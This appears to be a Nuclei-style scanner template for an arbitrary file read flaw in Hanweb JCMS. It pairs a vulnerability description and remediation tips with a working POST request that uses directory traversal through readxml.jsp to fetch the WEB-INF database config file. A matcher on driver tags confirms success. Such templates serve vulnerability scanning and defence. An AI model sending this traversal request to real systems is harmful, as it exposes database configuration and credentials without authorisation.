id: JCMS-DBCONFIG-FILEREAD
info:
  name: JCMS DBCONFIG FILE READ
  author:
  - l0ne1y
  description: |-
    Hanweb JCMS readxml.jsp arbitrary file read vulnerability.
    Hanweb JCMS is a content management system designed on a J2EE architecture. The system provides all the functions needed throughout the information lifecycle, including content collection, creation, management, delivery, publishing, and shared distribution.

    Hanweb JCMS has an arbitrary file read vulnerability. An attacker can exploit it to read the content of arbitrary files.
  severity: medium
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    https://www.hanweb.com/

    Temporary Fix:
    1. Filter ".", preventing users from traversing to parent directories in the URL.
    2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.
    4. Store file paths in the database and let users download files by submitting the corresponding file ID.
    5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"<driver-class>") && contains(body,"<driver-properties>")
  matchers-condition: and
  path:
  - '{{BaseURL}}/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig'
  method: POST
